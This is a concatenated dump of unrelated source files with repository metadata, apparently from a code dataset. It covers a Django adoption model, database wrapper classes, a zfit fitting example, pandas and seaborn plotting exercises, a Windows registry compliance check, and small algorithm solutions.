    np.fill_diagonal(a=D, val=np.inf)  # a point is not its own neighbour
    nn = np.argmin(D[:rEEM - maxEmbDim - k, :], axis=1)  # nearest neighbour of each point
    fnn1 = np.asarray([abs(y[i + maxEmbDim + k - 1]-y[li + maxEmbDim + k - 1])/D[i, li] for i,li in enumerate(nn) if D[i, li] > 0 and li + maxEmbDim + k - 1 < it])
    fnn2 = np.asarray([abs(y[i + maxEmbDim + k - 1]-y[li + maxEmbDim + k - 1])/sigmay for i,li in enumerate(nn) if D[i, li] > 0 and li + maxEmbDim + k - 1 < it])
    Ind1[k-1] = len(np.where(np.asarray(fnn1) > RT)[0])
    Ind2[k-1] = len(np.where(np.asarray(fnn2) > AT)[0])
    if embedm == 0:  # only for plot
        # NOTE(review): `Ind2[-1]` looks like it should be `Ind2[k-1]` -- confirm
        if Ind1[k-1] / len(fnn1) < .1 and Ind2[-1] / len(fnn1) < .1 and Ind1[k-1] != 0:
            embedm = k
            # break  # uncomment for true algorithm

fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8,8))
ax.plot(np.arange(0, maxEmbDim), Ind1)
ax.set_xlabel('Embedding dimension', fontsize=14)
ax.set_ylabel('% FNN', fontsize=14)
ax.set_title('Optimal Embedding Dimension with FNN', fontsize=16)
ax.plot(embedm, Ind1[embedm], 'r.')
plt.text(embedm, Ind1[embedm] + 100, "EmbDim = $%d$"%(embedm))
| [
"nico.curti2@unibo.it"
] | nico.curti2@unibo.it |
9e5a7e72a9833ec32ef8a92895d30c8b3d688938 | 66b2bccf07754119b9eed320d9f7715fa52f6d44 | /scrapy_learn1/utils/dbbaseutil.py | 2c512ebc43bf825ae27711e81ddf171a5572ea7b | [] | no_license | wangsanshi123/scrapy_learn1 | 678c3708e3765ab26cff8799a55d0153abe9da55 | 16bf80a634484842e9b66db9138c2f4c8769d087 | refs/heads/master | 2020-03-08T07:42:56.260798 | 2018-04-04T03:26:58 | 2018-04-04T03:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,566 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import warnings
import sqlite3
import pymysql
warnings.filterwarnings('ignore')
__author__ = 'yangsheng'
class DBUtil(object):
    """Thin convenience wrapper around a sqlite3 connection."""

    def __init__(self, dbpath):
        self._dbpath = dbpath
        self._conn = sqlite3.connect(self._dbpath)

    def cursor_execute_one(self, sql):
        """Execute a query and lazily yield its rows one at a time."""
        cursor = self._conn.cursor()
        try:
            cursor.execute(sql)
            row = cursor.fetchone()
            while row is not None:
                yield row
                row = cursor.fetchone()
        finally:
            # Also runs when the generator is closed early or garbage
            # collected, so the cursor is never leaked.
            cursor.close()

    def cursor_execute(self, sql):
        """Execute a query and return all rows as a list."""
        cursor = self._conn.cursor()
        try:
            cursor.execute(sql)
            return cursor.fetchall()
        finally:
            cursor.close()

    def cursor_execute_nosearch(self, sql, comm=False, datas=None):
        """Execute a non-query SQL statement (no result returned).

        :param sql: SQL statement
        :param comm: commit after executing when True
        :param datas: optional parameter tuple bound to the statement
        """
        cursor = self._conn.cursor()
        try:
            if datas:
                cursor.execute(sql, datas)
            else:
                cursor.execute(sql)
        finally:
            # Previously this cursor was never closed.
            cursor.close()
        if comm:
            self._conn.commit()

    def commit(self):
        """Commit any updates made since the last commit."""
        self._conn.commit()

    def close(self):
        """Close the underlying connection (added for parity with MysqlUtil)."""
        self._conn.close()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
class MysqlUtil(object):
    """Thin convenience wrapper around a pymysql connection."""

    def __init__(self, dbhost, dbport, dbname, dbuser, dbpwd, charset='utf8'):
        self.dbhost = dbhost
        self.dbport = dbport
        self.dbname = dbname
        self.dbuser = dbuser
        self.dbpwd = dbpwd
        self.charset = charset
        self._conn = pymysql.connect(host=dbhost, port=dbport, db=dbname,
                                     user=dbuser, passwd=dbpwd, charset=charset)

    def cursor_execute_nosearch(self, sql, comm=False, datas=None):
        """Execute a non-query SQL statement (no result returned).

        :param sql: SQL statement
        :param comm: commit after executing when True
        :param datas: optional parameter tuple bound to the statement
            (added for consistency with DBUtil.cursor_execute_nosearch)
        """
        cursor = self._conn.cursor()
        try:
            if datas:
                cursor.execute(sql, datas)
            else:
                cursor.execute(sql)
        finally:
            # Close the cursor even if execute raises.
            cursor.close()
        if comm:
            self._conn.commit()

    def cursor_execute(self, sql):
        """Execute a query and return all rows."""
        cursor = self._conn.cursor()
        try:
            cursor.execute(sql)
            return cursor.fetchall()
        finally:
            cursor.close()

    def commit(self):
        """Commit the pending transaction."""
        self._conn.commit()

    def close(self):
        """Close the underlying connection."""
        self._conn.close()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
| [
"118319592@qq.com"
] | 118319592@qq.com |
b751373ce90366b0f78e58e0b5902ed2dfc9ceb2 | 69d8a912212c1355470c298ac4f2fb716aed9982 | /proyecto/adopcion/models.py | 1f6b436c1ecfcf697d872172f1543322344ffd27 | [] | no_license | juampiludu/almanimal | b7fa92cb34cd8b908ef609036fb647fd1ca328a7 | 033037823252a13fd20514c226dd100837fdc610 | refs/heads/master | 2023-01-20T17:46:57.671217 | 2020-12-02T04:05:03 | 2020-12-02T04:05:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,022 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils.html import mark_safe
from django.templatetags.static import static
# Create your models here.
class Animal(models.Model):
    """Animal put up for adoption, created and published by a staff member."""

    class Sexo(models.TextChoices):
        MACHO = 'Macho'
        HEMBRA = 'Hembra'
        INDEFINIDO = 'Indefinido'

    class Tamaño(models.TextChoices):
        GRANDE = 'Grande'
        MEDIANO = 'Mediano'
        CHICO = 'Chico'

    class TipoAnimal(models.TextChoices):
        PERRO = 'Perro'
        GATO = 'Gato'
        OTRO = 'Otro'

    class Tiempo(models.TextChoices):
        DIAS = 'Días'
        SEMANAS = 'Semanas'
        MESES = 'Meses'
        AÑOS = 'Años'

    class Meta:
        verbose_name = 'Animal'
        verbose_name_plural = 'Animales'

    def __str__(self):
        return self.nombre

    # Only staff users may own (create) adoption records.
    dueño = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='Creador', limit_choices_to={'is_staff':True})
    nombre = models.CharField(verbose_name='Nombre', max_length=255, null=False, blank=False)
    tipo_animal = models.CharField(verbose_name='Tipo de animal', max_length=40, choices=TipoAnimal.choices, null=False, blank=False)
    raza = models.CharField(verbose_name='Raza', max_length=255, null=False, blank=False)
    tamaño = models.CharField(verbose_name='Tamaño', max_length=40, choices=Tamaño.choices, null=False, blank=False)
    foto1 = models.ImageField(verbose_name="Foto 1", blank=True, null=True, upload_to='foto1')
    foto2 = models.ImageField(verbose_name="Foto 2", blank=True, null=True, upload_to='foto2')
    # Age is expressed as `edad` units of `tiempo` (days/weeks/months/years).
    edad = models.IntegerField(verbose_name='Edad', null=False, blank=False)
    tiempo = models.CharField("Tiempo", max_length=50, choices=Tiempo.choices, null=False, blank=False)
    sexo = models.CharField(verbose_name='Sexo', max_length=40, choices=Sexo.choices, null=False, blank=False)
    descripcion = models.TextField(verbose_name='Descripcion', null=False, blank=False)
    caracter = models.TextField(verbose_name='Carácter', null=True, blank=True)
    vacunado = models.BooleanField(verbose_name='Vacunado', null=False, blank=False)
    desparasitado = models.BooleanField(verbose_name='Desparasitado', null=False, blank=False)
    castrado = models.BooleanField(verbose_name='Castrado', null=False, blank=False)
    comentario = models.TextField(verbose_name='Comentarios', null=True, blank=True)
    telefono = models.CharField("Teléfono de contacto", max_length=50)
    email = models.EmailField("Email de contacto", max_length=254)
    publicado = models.BooleanField(verbose_name='Publicado', default=False)
    creado = models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')
    actualizado = models.DateTimeField(auto_now=True, verbose_name='Ultima actualización')

    def _thumbnail_html(self, image_field):
        # Shared renderer for the admin list thumbnails; falls back to a
        # placeholder when no image has been uploaded.
        if image_field and hasattr(image_field, 'url'):
            src = image_field.url
        else:
            src = static("/adopcion/img/no-image.png")
        return mark_safe(f'<img style="object-fit:cover; height:100px; width:100px" src={src} />')

    def image_tag(self):
        return self._thumbnail_html(self.foto1)
    image_tag.short_description = ''

    def image_tag2(self):
        return self._thumbnail_html(self.foto2)
    image_tag2.short_description = ''

    def save(self, *args, **kwargs):
        # When an image is replaced, delete the previous file from storage so
        # orphaned uploads do not accumulate.
        try:
            previous = Animal.objects.get(id=self.id)
            if previous.foto1 != self.foto1:
                previous.foto1.delete()
            if previous.foto2 != self.foto2:
                previous.foto2.delete()
        except Animal.DoesNotExist:
            # First save of a new record: nothing to clean up.  (This was a
            # bare `except` that silently swallowed every other error too.)
            pass
        super().save(*args, **kwargs)
| [
"juanzakka@gmail.com"
] | juanzakka@gmail.com |
96c5e9e11b6540e09bfed4c444788cc0a3fcee75 | 119f503a2786a929db24937c2b91d63ac9c2af72 | /examples/plot_sig_bkg.py | be5db7ccfca401c916b1cf0e9d086ed26b2c7c44 | [
"BSD-3-Clause"
] | permissive | loopylangur/zfit | f1c1e352eca5c1e58fbe276ba4b65b409f0faa6d | 535b970dfb6611ef687a184746b9e191756506ba | refs/heads/master | 2020-12-20T14:41:30.985958 | 2020-01-12T15:28:54 | 2020-01-12T15:28:54 | 236,109,089 | 0 | 0 | null | 2020-01-25T00:59:17 | 2020-01-25T00:59:16 | null | UTF-8 | Python | false | false | 2,592 | py | # Copyright (c) 2019 zfit
import numpy as np
import zfit
import matplotlib.pyplot as plt

# create space: one-dimensional observable "x" on [-10, 10]
obs = zfit.Space("x", limits=(-10, 10))

# parameters: (name, initial value, lower limit, upper limit)
mu = zfit.Parameter("mu", 1., -4, 6)
sigma = zfit.Parameter("sigma", 1., 0.1, 10)
lambd = zfit.Parameter("lambda", -0.06, -1, -0.01)
frac = zfit.Parameter("fraction", 0.3, 0, 1)

# model building, pdf creation: Gaussian signal + exponential background,
# combined with the signal fraction `frac`
gauss = zfit.pdf.Gauss(mu=mu, sigma=sigma, obs=obs)
exponential = zfit.pdf.Exponential(lambd, obs=obs)
model = zfit.pdf.SumPDF([gauss, exponential], fracs=frac)

# data
n_sample = 10000
# NOTE(review): these two per-component samples are never used below;
# the toy dataset actually comes from the sampler on the summed model.
exp_data = exponential.sample(n=n_sample * (1 - frac)).numpy()
gauss_data = gauss.sample(n=n_sample * frac).numpy()
# The sampler draws at the CURRENT parameter values; resample() fixes the
# dataset BEFORE the parameters are shifted below.
data = model.create_sampler(n_sample, limits=obs)
data.resample()
# shift the parameters away from the generation values so the fit has work to do
mu.set_value(0.5)
sigma.set_value(1.2)
lambd.set_value(-0.05)
frac.set_value(0.07)

# plot the data
data_np = data[:, 0].numpy()

color = 'black'
n_bins = 50
linewidth = 2.5
# scale unit-normalized pdfs up to expected event counts per histogram bin
plot_scaling = n_sample / n_bins * obs.area()

x = np.linspace(-10, 10, 1000)

# plot the pdf BEFORE fitting
plt.figure()
plt.title("Before fitting")
# plot the data
plt.hist(data_np, color=color, bins=n_bins, histtype="stepfilled", alpha=0.1)
plt.hist(data_np, color=color, bins=n_bins, histtype="step")
# plot the pdfs; each component is weighted by its fraction so they stack to the sum
y = model.pdf(x).numpy()
y_gauss = (gauss.pdf(x) * frac).numpy()  # notice the frac!
y_exp = (exponential.pdf(x) * (1 - frac)).numpy()  # notice the frac!
plt.plot(x, y * plot_scaling, label="Sum - Model", linewidth=linewidth * 2)
plt.plot(x, y_gauss * plot_scaling, '--', label="Gauss - Signal", linewidth=linewidth)
plt.plot(x, y_exp * plot_scaling, '--', label="Exponential - Background", linewidth=linewidth)
plt.xlabel("Physical observable")
plt.legend()

# create NLL: unbinned negative log-likelihood of the model given the toy data
nll = zfit.loss.UnbinnedNLL(model=model, data=data)

# create a minimizer and run the fit (updates the parameter values in place)
minimizer = zfit.minimize.Minuit()
result = minimizer.minimize(nll)

# do the error calculations, here with minos
param_errors = result.error()

plt.figure()
plt.title("After fitting")
# plot the data
plt.hist(data_np, color=color, bins=n_bins, histtype="stepfilled", alpha=0.1)
plt.hist(data_np, color=color, bins=n_bins, histtype="step")

y = model.pdf(x).numpy()  # rerun now after the fitting
y_gauss = (gauss.pdf(x) * frac).numpy()
y_exp = (exponential.pdf(x) * (1 - frac)).numpy()

plt.plot(x, y * plot_scaling, label="Sum - Model", linewidth=linewidth * 2)
plt.plot(x, y_gauss * plot_scaling, '--', label="Gauss - Signal", linewidth=linewidth)
plt.plot(x, y_exp * plot_scaling, '--', label="Exponential - Background", linewidth=linewidth)
plt.xlabel("Physical observable")
plt.legend()

plt.show()
| [
"mayou36@jonas.eschle.com"
] | mayou36@jonas.eschle.com |
9ef8ca178f37669d0f1c6165b9589e22eec12759 | 8a6dbabe023deea0d29e666bc4d6d7a53a51f08d | /tests/test_drug_response.py | aa7473787c40a3b048261fec9ad60fc92a61aba5 | [
"CC-BY-NC-ND-4.0",
"Apache-2.0"
] | permissive | pasmopy/breast_cancer | 01d2c1f387364b71fc99a7a5250b0d39decd7575 | f6113dd286476069d1abc7627475e626e5cbeafc | refs/heads/master | 2023-04-10T03:08:52.806513 | 2022-09-21T15:52:03 | 2022-09-21T15:52:03 | 348,209,066 | 7 | 4 | Apache-2.0 | 2022-09-21T15:52:05 | 2021-03-16T04:05:57 | Python | UTF-8 | Python | false | false | 984 | py | import os
import shutil
import pandas as pd
from drug_response.drug.database import CancerCellLineEncyclopedia
def test_create_figs():
    """Each compound must produce one PDF per output directory."""
    output_dirs = ["dose_response", "activity_area"]
    # Start from a clean slate: drop figures left over from earlier runs.
    for folder in output_dirs:
        if os.path.isdir(folder):
            shutil.rmtree(folder)
    ccle = CancerCellLineEncyclopedia()
    erbb_expression_ratio = pd.read_csv(
        os.path.join("drug_response", "data", "ErbB_expression_ratio.csv"),
        index_col=0,
    )
    for compound in list(set(ccle.drug_response_data["Compound"])):
        ccle.save_all(erbb_expression_ratio, compound)
        for folder in output_dirs:
            expected_pdf = os.path.join(
                folder,
                f"{ccle._drug2target(compound)}",
                f"{ccle._convert_drug_name(compound)}.pdf",
            )
            assert os.path.isfile(expected_pdf)
def test_cleanup():
for dir in ["dose_response", "activity_area"]:
shutil.rmtree(dir)
| [
"31299606+himoto@users.noreply.github.com"
] | 31299606+himoto@users.noreply.github.com |
72587c53ee9d480ee96056750566064d1ab30347 | 4c82c378774437b4fece5865a469485d11dd5c04 | /games/files_directories.py | 013a16b59ba58486ac2ffae7e1b4f38ad5e817c5 | [] | no_license | Cunarefa/Matrix | 54c4bbfd588d5f1a5d5889228be5224b85889538 | 634a793c1554458ab6b9b65014ba3fde279b4c4d | refs/heads/master | 2023-07-25T17:39:02.795840 | 2021-09-10T11:25:31 | 2021-09-10T11:25:31 | 401,263,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | from abc import ABC, abstractmethod
class Component(ABC):
    """Common interface for files and directories (Composite pattern)."""

    @abstractmethod
    def get_size(self):
        """Return the size of this component."""

    def add_component(self, component):
        """Add a child component; leaf components silently ignore this."""
class File(Component):
    """Leaf node of the composite: a file with a fixed size."""

    def __init__(self, size):
        self.size = size

    def __add__(self, other):
        """Adding two files yields the sum of their sizes (an int)."""
        combined = self.size + other.size
        return combined

    @property
    def get_size(self):
        """Size of the file itself."""
        return self.size
class Directory(Component):
    """Composite node: aggregates files and sub-directories."""

    def __init__(self, components):
        # Child components; each must expose a `get_size` property.
        self.components = components
        # Vestigial cursor kept for backward compatibility (it belonged to a
        # removed, commented-out iterator implementation).
        self.limit = -1

    @property
    def get_size(self):
        """Total size of all children, computed recursively."""
        return sum(child.get_size for child in self.components)

    def add_component(self, component):
        """Attach another file or directory to this directory."""
        self.components.append(component)
# Demo: two files, one nested directory; sizes are aggregated recursively.
s = File(50)
d = File(20)
q = Directory([s, d])
# NOTE: `dir` shadows the builtin of the same name in this script.
dir = Directory([s, q])
print(dir.get_size, '\n')
dir.add_component(d)
print(dir.get_size)
| [
"yevgen.yelik@gmail.com"
] | yevgen.yelik@gmail.com |
ec7974d7ba5104cef543b2d76097554593a51e29 | a1d8b5de6a54dc942f63e2e4a946db174cae0996 | /ctci-making-anagrams/main.py | 5af3a78f3b4833c0e58dbb912cc1a9f0c63d7d09 | [
"MIT"
] | permissive | joaojunior/hackerrank | 5dae64166b6fdbec8b7bd2112443fdfde0e64e74 | a5ee0449e791535930b8659dfb7dddcf9e1237de | refs/heads/master | 2021-11-22T07:53:33.978238 | 2021-09-28T00:35:16 | 2021-09-28T00:35:16 | 116,694,043 | 0 | 1 | MIT | 2018-02-21T00:29:09 | 2018-01-08T15:29:26 | Python | UTF-8 | Python | false | false | 354 | py | def make_anagrams(a, b):
d_a = {}
d_b = {}
qty = 0
for c in a:
d_a[c] = d_a.get(c, 0) + 1
for c in b:
d_b[c] = d_b.get(c, 0) + 1
for c, frequency in d_a.items():
qty += abs(frequency - d_b.get(c, 0))
for c, frequency in d_b.items():
if c not in d_a:
qty += frequency
return qty
| [
"jcajcefet@yahoo.com.br"
] | jcajcefet@yahoo.com.br |
adfe0cf1de9c32946f939923d8014e797f2e7db0 | 01fdd206c8c825b30870bdd3f6e75f0aa113b849 | /test/record/parser/test_response_whois_isoc_org_il_property_status_transfer_allowed.py | 3e8870b0af59fcdedef88641297afba471c8dc7e | [
"MIT"
] | permissive | huyphan/pyyawhois | 0fbc5a7d64a53ae6e3393fdc1c7ff0d0ac5f22b5 | 77fb2f73a9c67989f1d41d98f37037406a69d136 | refs/heads/master | 2021-01-23T22:42:55.989651 | 2015-09-19T16:40:06 | 2015-09-19T16:40:06 | 23,335,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py |
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.isoc.org.il/property_status_transfer_allowed
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisIsocOrgIlPropertyStatusTransferAllowed(object):
    # Auto-generated, fixture-driven test (see file header): feeds a canned
    # whois.isoc.org.il response into yawhois and checks derived properties.
    def setUp(self):
        # NOTE(review): the fixture file handle is never closed — generated code.
        fixture_path = "spec/fixtures/responses/whois.isoc.org.il/property_status_transfer_allowed.txt"
        host = "whois.isoc.org.il"
        part = yawhois.record.Part(open(fixture_path, "r").read(), host)
        self.record = yawhois.record.Record(None, [part])

    def test_status(self):
        eq_(self.record.status, 'registered')

    def test_available(self):
        eq_(self.record.available, False)

    def test_registered(self):
        eq_(self.record.registered, True)
| [
"dachuy@gmail.com"
] | dachuy@gmail.com |
ba5c8b5a65db1e493db1a3389552f2447aac39b0 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11110011.py | 6a4ef801f0e27b7b31926ae3ec0e52db71d2bbe9 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,132 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11110011.py generated: Wed, 25 Jan 2017 15:25:20
#
# Event Type: 11110011
#
# ASCII decay Descriptor: {[[B0]nos -> mu+ (tau- -> pi+ pi- pi- nu_tau) (K*(892)0 -> K+ pi-)]cc, [[B0]nos -> (tau+ -> pi+ pi- pi+ anti-nu_tau) mu- (K*(892)0 -> K+ pi-)]cc, [[B0]os -> mu- (tau+ -> pi+ pi- pi+ anti-nu_tau) (K*(892)~0 -> K- pi+)]cc, [[B0]os -> (tau- -> pi+ pi- pi- nu_tau) mu+ (K*(892)~0 -> K- pi+)]cc}
#
# Gauss generator configuration for event type 11110011 (see file header
# for the full decay descriptor).
from Configurables import Generation
Generation().EventType = 11110011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
# EvtGen user decay file describing the signal decay chain.
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_Ksttaumu,3pi=DecProdCut,tauolababar.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
cb8dcbaeebb340b0047d76d8fbbc2286bb66e39b | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /ArraysAndStrings/IsUnique/IsUnique.py | 4841949c494375e7ad7ad4044c532c52a0ddc5b6 | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Accepts a string and returns true if all chars in the string are
# unique. Returns false otherwise. Assumes strings made up of
# lowercase letters 'a' through 'z'
def isUniqueChars(str):
    """Return True if no character repeats in *str*.

    Assumes the input contains only lowercase 'a'..'z'; each letter is
    tracked as one bit of an integer bitmask.
    """
    seen_mask = 0
    for ch in str:
        bit = 1 << (ord(ch) - ord('a'))
        if seen_mask & bit:
            return False
        seen_mask |= bit
    return True
# Below implementation assumes ASCII strings - 128 unique chars. This
# helps to achieve both O(1) time and space complexities (actually O(128)).
def isUniqueCharsASCII(str):
    """Return True if all characters of the ASCII string *str* are unique.

    More than 128 characters cannot all be distinct ASCII codes, so longer
    strings are rejected immediately.
    """
    if len(str) > 128:
        return False  # bug fix: was lowercase `false`, a NameError at runtime
    checker = [False] * 128
    for c in str:
        value = ord(c)  # ASCII code of the char
        if checker[value] is True:
            return False
        checker[value] = True
    return True
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
f2b8894c23d54c6d333e01186a92793a177ca940 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/226/users/4424/codes/1637_2443.py | da74fa2d94940f25db95693ea2d3556c85cc5da1 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | # Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Use as mensagens de erro para corrigir seu código.
from math import*
# Spherical-cap volume calculator: r = sphere radius [m], h = cap height,
# n selects the output (1 = cap volume, 2 = sphere volume minus the cap).
r = float(input("Digite um numero: "))
h = float(input("Digite um numero: "))
n = float(input("Digite um numero: "))
if(n==1):
    x=((pi*h**2)*(3*r-h))/3
if(n==2):
    x=((4*pi*r**3)/3)-((pi*h**2)*(3*r-h))/3
# NOTE(review): if n is neither 1 nor 2, `x` is undefined and this raises.
print(round(x, 4))
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
06d7833c5cf9a4d4c3c82424abe3000b5fccce9a | 34599596e145555fde0d4264a1d222f951f49051 | /pcat2py/class/212441d0-5cc5-11e4-af55-00155d01fe08.py | ce239a839bec9440133bfd44d09eebdbf2016b3e | [
"MIT"
] | permissive | phnomcobra/PCAT2PY | dc2fcbee142ce442e53da08476bfe4e68619346d | 937c3b365cdc5ac69b78f59070be0a21bdb53db0 | refs/heads/master | 2021-01-11T02:23:30.669168 | 2018-02-13T17:04:03 | 2018-02-13T17:04:03 | 70,970,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | #!/usr/bin/python
################################################################################
# 212441d0-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
    """Compliance finding for the Terminal Services ``DisablePasswordSaving``
    registry value: compliant when the DWORD equals 1."""

    def __init__(self):
        self.output = []
        self.is_compliant = False
        self.uuid = "212441d0-5cc5-11e4-af55-00155d01fe08"

    def check(self, cli):
        """Read the registry value through *cli*, record what was seen in
        ``self.output``, and return the resulting compliance flag."""
        self.is_compliant = False  # reset before probing
        value = cli.get_reg_dword(r'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services', 'DisablePasswordSaving')
        self.output = [r'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services', ('DisablePasswordSaving=' + str(value))]
        self.is_compliant = value == 1
        return self.is_compliant

    def fix(self, cli):
        """Create the registry path (parents first) and set the value to 1."""
        cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft'")
        cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft\Windows NT'")
        cli.powershell(r"New-Item -path 'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services'")
        cli.powershell(r"Set-ItemProperty -path 'HKLM:\Software\Policies\Microsoft\Windows NT\Terminal Services' -name 'DisablePasswordSaving' -value 1 -Type DWord")
| [
"phnomcobra@gmail.com"
] | phnomcobra@gmail.com |
a33256408c609682eb43687b84b9c799e96b48e9 | 7c44b3e06bd9d212b81e1d237c2bf945940b8893 | /numpy_pandas_matplotlib/matplotlib_and_seaborn_part_1/bar_chart_practice.py | c76603b8b5de4ae08b6b6ee2a954a9fd4a89edfe | [] | no_license | sivaneshl/ai_programming_with_python | e89f9faf566b01b844fe83329dd3e54257141397 | 75801197fcc1ebbb827cc9c8cf7c8ab9e373e1e2 | refs/heads/master | 2022-04-11T07:58:50.148433 | 2020-04-05T05:22:16 | 2020-04-05T05:22:16 | 248,581,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,890 | py | # prerequisite package imports
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
pokemon = pd.read_csv('pokemon.csv')
print(pokemon.head())
# Task 1: There have been quite a few Pokémon introduced over the series' history. How many were introduced in each
# generation? Create a bar chart of these frequencies using the 'generation_id' column.
base_color = sb.color_palette()[0]
# n_pkmn_gen = pokemon.groupby(['generation_id'])['id'].agg(count=np.size)
# sb.barplot(n_pkmn_gen.index.values, n_pkmn_gen['count'], color=base_color)
sb.countplot(data=pokemon[['generation_id','id']], x='generation_id', color=base_color)
plt.show()
# Task 2: Each Pokémon species has one or two 'types' that play a part in its offensive and defensive capabilities.
# How frequent is each type? The code below creates a new dataframe that puts all of the type counts in a single column.
pkmn_types = pokemon.melt(id_vars=['id','species'],
                          value_vars=['type_1', 'type_2'],
                          var_name='type_level',
                          value_name='type').dropna()
# pkmn_types.head()
# Your task is to use this dataframe to create a relative frequency plot of the proportion of Pokémon with each type,
# sorted from most frequent to least. Hint: The sum across bars should be greater than 100%, since many Pokémon have
# two types. Keep this in mind when considering a denominator to compute relative frequencies.
type_counts = pkmn_types['type'].value_counts()
type_order = type_counts.index
n_pokemon = pokemon.shape[0]
max_type_count = type_counts[0]
max_prop = max_type_count / n_pokemon
# Tick positions every 2% of the total, labeled as proportions.
ticks_prop = np.arange(0, max_prop, 0.02)
tick_names = ['{:0.2f}'.format(x) for x in ticks_prop]
sb.countplot(data=pkmn_types, y='type', color=base_color, order=type_order)
plt.xticks(ticks_prop * n_pokemon, tick_names)
plt.show()
"sivaneshl@virtusa.com"
] | sivaneshl@virtusa.com |
d9e20c42cd6f1cd9777d48d2c582d65d0e74ca28 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/1009.py | d384122c55980468d170b2657602724644c3e86d | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | t=input()
m=1
while m<=t:
n,d=map(int,raw_input().split())
ti=[]
while d:
d-=1
a,v=map(int,raw_input().split())
ti.append(float(n-a)/float(v))
ti=max(ti)
print "Case #"+str(m)+": {0:.6f}".format(round(float(n)/float(ti),6))
m+=1 | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
5b370a69edfe4fc04c6aecace8d9746361dbb566 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/loadtesting/azure-mgmt-loadtesting/azure/mgmt/loadtesting/operations/__init__.py | 402d17a0616ec39fabd982a5382b8a74612463d5 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 917 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
